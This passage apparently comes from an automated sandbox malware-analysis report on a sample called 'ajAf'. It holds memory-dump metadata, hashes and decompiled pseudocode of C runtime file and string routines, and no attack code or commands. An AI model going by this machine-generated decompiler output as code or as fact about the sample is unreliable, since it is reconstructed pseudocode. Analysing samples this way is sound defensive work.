                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                          • String ID:
                                                          • API String ID: 3322701435-0
                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?), ref: 01FC1B6D
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 01FC1B96
                                                          • GetLastError.KERNEL32 ref: 01FC1BA7
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 01FC1BBF
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 01FC1BE7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                          • String ID:
                                                          • API String ID: 3322701435-0
                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                          • Instruction ID: cec0f8b09f3199ed60b61a7a80ec9a67795b4b7e1771e8c58a707cf0b82cb4ee
                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                          • Instruction Fuzzy Hash: A311E775500355FBD3309719CC88F677F6CEF86FA9F048118FE459A282D632A824CAB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E0040C748(void* __edx, void* __esi, char _a4) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __ebp;
                                                          				signed int _t70;
                                                          				signed int _t71;
                                                          				intOrPtr _t73;
                                                          				signed int _t75;
                                                          				signed int _t81;
                                                          				char _t82;
                                                          				signed int _t84;
                                                          				intOrPtr* _t86;
                                                          				signed int _t87;
                                                          				intOrPtr* _t90;
                                                          				signed int _t92;
                                                          				signed int _t94;
                                                          				void* _t96;
                                                          				signed char _t98;
                                                          				signed int _t99;
                                                          				intOrPtr _t102;
                                                          				signed int _t103;
                                                          				intOrPtr* _t104;
                                                          				signed int _t111;
                                                          				signed int _t114;
                                                          				intOrPtr _t115;
                                                          
                                                          				_t105 = __esi;
                                                          				_t97 = __edx;
                                                          				_t104 = _a4;
                                                          				_t87 = 0;
                                                          				_t121 = _t104;
                                                          				if(_t104 != 0) {
                                                          					_t70 = E0040FA20(__edx, _t104, _t104);
                                                          					__eflags =  *(_t104 + 4);
                                                          					_v8 = _t70;
                                                          					if(__eflags < 0) {
                                                          						 *(_t104 + 4) = 0;
                                                          					}
                                                          					_push(1);
                                                          					_push(_t87);
                                                          					_push(_t70);
                                                          					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                          					__eflags = _t71 - _t87;
                                                          					_v12 = _t71;
                                                          					if(_t71 < _t87) {
                                                          						L2:
                                                          						return _t71 | 0xffffffff;
                                                          					} else {
                                                          						_t98 =  *(_t104 + 0xc);
                                                          						__eflags = _t98 & 0x00000108;
                                                          						if((_t98 & 0x00000108) != 0) {
                                                          							_t73 =  *_t104;
                                                          							_t92 =  *(_t104 + 8);
                                                          							_push(_t105);
                                                          							_v16 = _t73 - _t92;
                                                          							__eflags = _t98 & 0x00000003;
                                                          							if((_t98 & 0x00000003) == 0) {
                                                          								__eflags = _t98;
                                                          								if(__eflags < 0) {
                                                          									L15:
                                                          									__eflags = _v12 - _t87;
                                                          									if(_v12 != _t87) {
                                                          										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                          										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                          											L40:
                                                          											_t75 = _v16 + _v12;
                                                          											__eflags = _t75;
                                                          											L41:
                                                          											return _t75;
                                                          										}
                                                          										_t99 =  *(_t104 + 4);
                                                          										__eflags = _t99 - _t87;
                                                          										if(_t99 != _t87) {
                                                          											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                          											_a4 = _t73 - _t92 + _t99;
                                                          											_t111 = (_v8 & 0x0000001f) << 6;
                                                          											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                          											if(__eflags == 0) {
                                                          												L39:
                                                          												_t66 =  &_v12;
                                                          												 *_t66 = _v12 - _a4;
                                                          												__eflags =  *_t66;
                                                          												goto L40;
                                                          											}
                                                          											_push(2);
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                          											if(__eflags != 0) {
                                                          												_push(0);
                                                          												_push(_v12);
                                                          												_push(_v8);
                                                          												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                          												__eflags = _t81;
                                                          												if(_t81 >= 0) {
                                                          													_t82 = 0x200;
                                                          													__eflags = _a4 - 0x200;
                                                          													if(_a4 > 0x200) {
                                                          														L35:
                                                          														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                          														L36:
                                                          														_a4 = _t82;
                                                          														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                          														L37:
                                                          														if(__eflags != 0) {
                                                          															_t63 =  &_a4;
                                                          															 *_t63 = _a4 + 1;
                                                          															__eflags =  *_t63;
                                                          														}
                                                          														goto L39;
                                                          													}
                                                          													_t94 =  *(_t104 + 0xc);
                                                          													__eflags = _t94 & 0x00000008;
                                                          													if((_t94 & 0x00000008) == 0) {
                                                          														goto L35;
                                                          													}
                                                          													__eflags = _t94 & 0x00000400;
                                                          													if((_t94 & 0x00000400) == 0) {
                                                          														goto L36;
                                                          													}
                                                          													goto L35;
                                                          												}
                                                          												L31:
                                                          												_t75 = _t81 | 0xffffffff;
                                                          												goto L41;
                                                          											}
                                                          											_t84 =  *(_t104 + 8);
                                                          											_t96 = _a4 + _t84;
                                                          											while(1) {
                                                          												__eflags = _t84 - _t96;
                                                          												if(_t84 >= _t96) {
                                                          													break;
                                                          												}
                                                          												__eflags =  *_t84 - 0xa;
                                                          												if( *_t84 == 0xa) {
                                                          													_t44 =  &_a4;
                                                          													 *_t44 = _a4 + 1;
                                                          													__eflags =  *_t44;
                                                          												}
                                                          												_t84 = _t84 + 1;
                                                          												__eflags = _t84;
                                                          											}
                                                          											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                          											goto L37;
                                                          										}
                                                          										_v16 = _t87;
                                                          										goto L40;
                                                          									}
                                                          									_t75 = _v16;
                                                          									goto L41;
                                                          								}
                                                          								_t81 = E0040BFC1(__eflags);
                                                          								 *_t81 = 0x16;
                                                          								goto L31;
                                                          							}
                                                          							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                          							_t114 = (_v8 & 0x0000001f) << 6;
                                                          							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                          							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                          								goto L15;
                                                          							}
                                                          							_t103 = _t92;
                                                          							__eflags = _t103 - _t73;
                                                          							if(_t103 >= _t73) {
                                                          								goto L15;
                                                          							}
                                                          							_t115 = _t73;
                                                          							do {
                                                          								__eflags =  *_t103 - 0xa;
                                                          								if( *_t103 == 0xa) {
                                                          									_v16 = _v16 + 1;
                                                          									_t87 = 0;
                                                          									__eflags = 0;
                                                          								}
                                                          								_t103 = _t103 + 1;
                                                          								__eflags = _t103 - _t115;
                                                          							} while (_t103 < _t115);
                                                          							goto L15;
                                                          						}
                                                          						return _t71 -  *(_t104 + 4);
                                                          					}
                                                          				}
                                                          				_t86 = E0040BFC1(_t121);
                                                          				_push(0);
                                                          				_push(0);
                                                          				_push(0);
                                                          				_push(0);
                                                          				_push(0);
                                                          				 *_t86 = 0x16;
                                                          				_t71 = E0040E744(__edx, _t104, __esi);
                                                          				goto L2;
                                                          			}






























                                                          0x0040c8cf
                                                          0x0040c8cf
                                                          0x00000000
                                                          0x0040c8cd
                                                          0x0040c8b0
                                                          0x0040c8b3
                                                          0x0040c8b6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c8b8
                                                          0x0040c8be
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c8be
                                                          0x0040c8a1
                                                          0x0040c8a1
                                                          0x00000000
                                                          0x0040c8a1
                                                          0x0040c86d
                                                          0x0040c873
                                                          0x0040c880
                                                          0x0040c880
                                                          0x0040c882
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c877
                                                          0x0040c87a
                                                          0x0040c87c
                                                          0x0040c87c
                                                          0x0040c87c
                                                          0x0040c87c
                                                          0x0040c87f
                                                          0x0040c87f
                                                          0x0040c87f
                                                          0x0040c884
                                                          0x00000000
                                                          0x0040c884
                                                          0x0040c82b
                                                          0x00000000
                                                          0x0040c82b
                                                          0x0040c7fe
                                                          0x00000000
                                                          0x0040c7fe
                                                          0x0040c80a
                                                          0x0040c80f
                                                          0x00000000
                                                          0x0040c80f
                                                          0x0040c7ce
                                                          0x0040c7d8
                                                          0x0040c7db
                                                          0x0040c7e0
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c7e2
                                                          0x0040c7e4
                                                          0x0040c7e6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c7e8
                                                          0x0040c7ea
                                                          0x0040c7ea
                                                          0x0040c7ed
                                                          0x0040c7ef
                                                          0x0040c7f2
                                                          0x0040c7f2
                                                          0x0040c7f2
                                                          0x0040c7f4
                                                          0x0040c7f5
                                                          0x0040c7f5
                                                          0x00000000
                                                          0x0040c7ea
                                                          0x00000000
                                                          0x0040c7ab
                                                          0x0040c79e
                                                          0x0040c75b
                                                          0x0040c760
                                                          0x0040c761
                                                          0x0040c762
                                                          0x0040c763
                                                          0x0040c764
                                                          0x0040c765
                                                          0x0040c76b
                                                          0x00000000

                                                          APIs
                                                          • __fileno.LIBCMT ref: 0040C77C
                                                          • __locking.LIBCMT ref: 0040C791
                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                          • String ID:
                                                          • API String ID: 2395185920-0
                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                          • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                          • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __fileno.LIBCMT ref: 01FCC9E3
                                                          • __locking.LIBCMT ref: 01FCC9F8
                                                            • Part of subcall function 01FCC228: __getptd_noexit.LIBCMT ref: 01FCC228
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __fileno__getptd_noexit__locking
                                                          • String ID:
                                                          • API String ID: 630670418-0
                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                          • Instruction ID: ee4b470a2108c20006ba6772b525ab08b7707b7d4ea38528f06515f454bcbfa5
                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                          • Instruction Fuzzy Hash: 5C51D671E0020BEFDB11CFACCA84758BBB1EF04B54F18826DD919A7281D732DA41EB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 97%
                                                          			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t30;
                                                          				signed int _t31;
                                                          				signed int _t32;
                                                          				signed int _t33;
                                                          				signed int _t35;
                                                          				signed int _t39;
                                                          				void* _t42;
                                                          				intOrPtr _t43;
                                                          				void* _t45;
                                                          				signed int _t48;
                                                          				signed int* _t53;
                                                          				void* _t54;
                                                          				void* _t55;
                                                          				void* _t57;
                                                          
                                                          				_t54 = __ebp;
                                                          				_t45 = __edx;
                                                          				_t42 = __ebx;
                                                          				_t53 = _a4;
                                                          				if(_t53 == 0) {
                                                          					L40:
                                                          					_t31 = _t30 | 0xffffffff;
                                                          					__eflags = _t31;
                                                          					return _t31;
                                                          				} else {
                                                          					_t43 = _a12;
                                                          					if(_t43 == 2) {
                                                          						goto L40;
                                                          					} else {
                                                          						_t30 = _t53[0xe];
                                                          						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                          							goto L40;
                                                          						} else {
                                                          							_t48 = _a8;
                                                          							if(_t53[0x17] != 0x77) {
                                                          								__eflags = _t43 - 1;
                                                          								if(_t43 == 1) {
                                                          									_t48 = _t48 + _t53[0x1a];
                                                          									__eflags = _t48;
                                                          								}
                                                          								__eflags = _t48;
                                                          								if(_t48 < 0) {
                                                          									goto L39;
                                                          								} else {
                                                          									__eflags = _t53[0x16];
                                                          									if(__eflags == 0) {
                                                          										_t33 = _t53[0x1a];
                                                          										__eflags = _t48 - _t33;
                                                          										if(_t48 < _t33) {
                                                          											_t30 = E004054F0(_t42, _t54, _t53);
                                                          											_t55 = _t55 + 4;
                                                          											__eflags = _t30;
                                                          											if(_t30 < 0) {
                                                          												goto L39;
                                                          											} else {
                                                          												goto L27;
                                                          											}
                                                          										} else {
                                                          											_t48 = _t48 - _t33;
                                                          											L27:
                                                          											__eflags = _t48;
                                                          											if(_t48 == 0) {
                                                          												L38:
                                                          												return _t53[0x1a];
                                                          											} else {
                                                          												__eflags = _t53[0x12];
                                                          												if(_t53[0x12] != 0) {
                                                          													L30:
                                                          													__eflags = _t53[0x1b] - 0xffffffff;
                                                          													if(_t53[0x1b] != 0xffffffff) {
                                                          														_t53[0x1a] = _t53[0x1a] + 1;
                                                          														_t48 = _t48 - 1;
                                                          														__eflags = _t53[0x1c];
                                                          														_t53[0x1b] = 0xffffffff;
                                                          														if(_t53[0x1c] != 0) {
                                                          															_t53[0xe] = 1;
                                                          														}
                                                          													}
                                                          													__eflags = _t48;
                                                          													if(_t48 <= 0) {
                                                          														goto L38;
                                                          													} else {
                                                          														while(1) {
                                                          															_t35 = 0x4000;
                                                          															__eflags = _t48 - 0x4000;
                                                          															if(_t48 < 0x4000) {
                                                          																_t35 = _t48;
                                                          															}
                                                          															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                          															_t55 = _t55 + 0xc;
                                                          															__eflags = _t30;
                                                          															if(_t30 <= 0) {
                                                          																goto L39;
                                                          															}
                                                          															_t48 = _t48 - _t30;
                                                          															__eflags = _t48;
                                                          															if(_t48 > 0) {
                                                          																continue;
                                                          															} else {
                                                          																goto L38;
                                                          															}
                                                          															goto L41;
                                                          														}
                                                          														goto L39;
                                                          													}
                                                          												} else {
                                                          													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                          													_t55 = _t55 + 4;
                                                          													_t53[0x12] = _t30;
                                                          													__eflags = _t30;
                                                          													if(_t30 == 0) {
                                                          														goto L39;
                                                          													} else {
                                                          														goto L30;
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									} else {
                                                          										_push(0);
                                                          										_push(_t48);
                                                          										_push(_t53[0x10]);
                                                          										_t53[0x1b] = 0xffffffff;
                                                          										_t53[1] = 0;
                                                          										 *_t53 = _t53[0x11];
                                                          										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                          										__eflags = _t30;
                                                          										if(_t30 < 0) {
                                                          											goto L39;
                                                          										} else {
                                                          											_t53[0x1a] = _t48;
                                                          											_t53[0x19] = _t48;
                                                          											return _t48;
                                                          										}
                                                          									}
                                                          								}
                                                          							} else {
                                                          								if(_t43 == 0) {
                                                          									_t48 = _t48 - _t53[0x19];
                                                          								}
                                                          								if(_t48 < 0) {
                                                          									L39:
                                                          									_t32 = _t30 | 0xffffffff;
                                                          									__eflags = _t32;
                                                          									return _t32;
                                                          								} else {
                                                          									if(_t53[0x11] != 0) {
                                                          										L11:
                                                          										if(_t48 <= 0) {
                                                          											L17:
                                                          											return _t53[0x19];
                                                          										} else {
                                                          											while(1) {
                                                          												_t39 = 0x4000;
                                                          												if(_t48 < 0x4000) {
                                                          													_t39 = _t48;
                                                          												}
                                                          												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                          												_t55 = _t55 + 0xc;
                                                          												if(_t30 == 0) {
                                                          													goto L39;
                                                          												}
                                                          												_t48 = _t48 - _t30;
                                                          												if(_t48 > 0) {
                                                          													continue;
                                                          												} else {
                                                          													goto L17;
                                                          												}
                                                          												goto L41;
                                                          											}
                                                          											goto L39;
                                                          										}
                                                          									} else {
                                                          										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                          										_t57 = _t55 + 4;
                                                          										_t53[0x11] = _t30;
                                                          										if(_t30 == 0) {
                                                          											goto L39;
                                                          										} else {
                                                          											E0040BA30(_t48, _t30, 0, 0x4000);
                                                          											_t55 = _t57 + 0xc;
                                                          											goto L11;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				L41:
                                                          			}



















                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e71
                                                          0x00000000
                                                          0x00405e50
                                                          0x00405e1a
                                                          0x00405e1f
                                                          0x00405e24
                                                          0x00405e27
                                                          0x00405e2a
                                                          0x00405e2c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e2c
                                                          0x00405e18
                                                          0x00405e12
                                                          0x00405dc3
                                                          0x00405dc9
                                                          0x00405dcb
                                                          0x00405dcc
                                                          0x00405dcd
                                                          0x00405dd4
                                                          0x00405ddb
                                                          0x00405ddd
                                                          0x00405de5
                                                          0x00405de7
                                                          0x00000000
                                                          0x00405ded
                                                          0x00405ded
                                                          0x00405df0
                                                          0x00405df7
                                                          0x00405df7
                                                          0x00405de7
                                                          0x00405dc1
                                                          0x00405d3a
                                                          0x00405d3c
                                                          0x00405d3e
                                                          0x00405d3e
                                                          0x00405d43
                                                          0x00405e79
                                                          0x00405e7a
                                                          0x00405e7a
                                                          0x00405e7e
                                                          0x00405d49
                                                          0x00405d4d
                                                          0x00405d77
                                                          0x00405d79
                                                          0x00405da7
                                                          0x00405dac
                                                          0x00405d7b
                                                          0x00405d80
                                                          0x00405d80
                                                          0x00405d87
                                                          0x00405d89
                                                          0x00405d89
                                                          0x00405d91
                                                          0x00405d96
                                                          0x00405d9b
                                                          0x00000000
                                                          0x00000000
                                                          0x00405da1
                                                          0x00405da5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405da5
                                                          0x00000000
                                                          0x00405d80
                                                          0x00405d4f
                                                          0x00405d54
                                                          0x00405d59
                                                          0x00405d5c
                                                          0x00405d61
                                                          0x00000000
                                                          0x00405d67
                                                          0x00405d6f
                                                          0x00405d74
                                                          0x00000000
                                                          0x00405d74
                                                          0x00405d61
                                                          0x00405d4d
                                                          0x00405d43
                                                          0x00405d38
                                                          0x00405d20
                                                          0x00405d14
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _fseek_malloc_memset
                                                          • String ID:
                                                          • API String ID: 208892515-0
                                                          • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                          • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                          • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                          • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t59;
                                                          				intOrPtr* _t61;
                                                          				signed int _t63;
                                                          				void* _t68;
                                                          				signed int _t69;
                                                          				signed int _t72;
                                                          				signed int _t74;
                                                          				signed int _t75;
                                                          				signed int _t77;
                                                          				signed int _t78;
                                                          				signed int _t81;
                                                          				signed int _t82;
                                                          				signed int _t84;
                                                          				signed int _t88;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				signed int _t99;
                                                          				intOrPtr* _t100;
                                                          				void* _t101;
                                                          
                                                          				_t90 = __edx;
                                                          				if(_a8 == 0 || _a12 == 0) {
                                                          					L4:
                                                          					return 0;
                                                          				} else {
                                                          					_t100 = _a16;
                                                          					_t105 = _t100;
                                                          					if(_t100 != 0) {
                                                          						_t82 = _a4;
                                                          						__eflags = _t82;
                                                          						if(__eflags == 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t63 = _t59 | 0xffffffff;
                                                          						_t90 = _t63 % _a8;
                                                          						__eflags = _a12 - _t63 / _a8;
                                                          						if(__eflags > 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t97 = _a8 * _a12;
                                                          						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                          						_v8 = _t82;
                                                          						_v16 = _t97;
                                                          						_t81 = _t97;
                                                          						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                          							_v12 = 0x1000;
                                                          						} else {
                                                          							_v12 =  *(_t100 + 0x18);
                                                          						}
                                                          						__eflags = _t97;
                                                          						if(_t97 == 0) {
                                                          							L32:
                                                          							return _a12;
                                                          						} else {
                                                          							do {
                                                          								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                          								__eflags = _t84;
                                                          								if(_t84 == 0) {
                                                          									L18:
                                                          									__eflags = _t81 - _v12;
                                                          									if(_t81 < _v12) {
                                                          										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                          										__eflags = _t68 - 0xffffffff;
                                                          										if(_t68 == 0xffffffff) {
                                                          											L34:
                                                          											_t69 = _t97;
                                                          											L35:
                                                          											return (_t69 - _t81) / _a8;
                                                          										}
                                                          										_v8 = _v8 + 1;
                                                          										_t72 =  *(_t100 + 0x18);
                                                          										_t81 = _t81 - 1;
                                                          										_v12 = _t72;
                                                          										__eflags = _t72;
                                                          										if(_t72 <= 0) {
                                                          											_v12 = 1;
                                                          										}
                                                          										goto L31;
                                                          									}
                                                          									__eflags = _t84;
                                                          									if(_t84 == 0) {
                                                          										L21:
                                                          										__eflags = _v12;
                                                          										_t98 = _t81;
                                                          										if(_v12 != 0) {
                                                          											_t75 = _t81;
                                                          											_t90 = _t75 % _v12;
                                                          											_t98 = _t98 - _t75 % _v12;
                                                          											__eflags = _t98;
                                                          										}
                                                          										_push(_t98);
                                                          										_push(_v8);
                                                          										_push(E0040FA20(_t90, _t98, _t100));
                                                          										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                          										_t101 = _t101 + 0xc;
                                                          										__eflags = _t74 - 0xffffffff;
                                                          										if(_t74 == 0xffffffff) {
                                                          											L36:
                                                          											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                          											_t69 = _v16;
                                                          											goto L35;
                                                          										} else {
                                                          											_t88 = _t98;
                                                          											__eflags = _t74 - _t98;
                                                          											if(_t74 <= _t98) {
                                                          												_t88 = _t74;
                                                          											}
                                                          											_v8 = _v8 + _t88;
                                                          											_t81 = _t81 - _t88;
                                                          											__eflags = _t74 - _t98;
                                                          											if(_t74 < _t98) {
                                                          												goto L36;
                                                          											} else {
                                                          												L27:
                                                          												_t97 = _v16;
                                                          												goto L31;
                                                          											}
                                                          										}
                                                          									}
                                                          									_t77 = E0040C1FB(_t100);
                                                          									__eflags = _t77;
                                                          									if(_t77 != 0) {
                                                          										goto L34;
                                                          									}
                                                          									goto L21;
                                                          								}
                                                          								_t78 =  *(_t100 + 4);
                                                          								__eflags = _t78;
                                                          								if(__eflags == 0) {
                                                          									goto L18;
                                                          								}
                                                          								if(__eflags < 0) {
                                                          									_t48 = _t100 + 0xc;
                                                          									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                          									__eflags =  *_t48;
                                                          									goto L34;
                                                          								}
                                                          								_t99 = _t81;
                                                          								__eflags = _t81 - _t78;
                                                          								if(_t81 >= _t78) {
                                                          									_t99 = _t78;
                                                          								}
                                                          								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                          								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                          								 *_t100 =  *_t100 + _t99;
                                                          								_t101 = _t101 + 0xc;
                                                          								_t81 = _t81 - _t99;
                                                          								_v8 = _v8 + _t99;
                                                          								goto L27;
                                                          								L31:
                                                          								__eflags = _t81;
                                                          							} while (_t81 != 0);
                                                          							goto L32;
                                                          						}
                                                          					}
                                                          					L3:
                                                          					_t61 = E0040BFC1(_t105);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					 *_t61 = 0x16;
                                                          					E0040E744(_t90, 0, _t100);
                                                          					goto L4;
                                                          				}
                                                          			}





























                                                          0x0040bac8
                                                          0x0040bac8
                                                          0x0040bacd
                                                          0x0040bace
                                                          0x0040bacf
                                                          0x0040bad0
                                                          0x0040bad1
                                                          0x0040bad2
                                                          0x0040bad8
                                                          0x00000000
                                                          0x0040badd

                                                          APIs
                                                          • __flush.LIBCMT ref: 0040BB6E
                                                          • __fileno.LIBCMT ref: 0040BB8E
                                                          • __locking.LIBCMT ref: 0040BB95
                                                          • __flsbuf.LIBCMT ref: 0040BBC0
                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                          • String ID:
                                                          • API String ID: 3240763771-0
                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                          • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                          • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
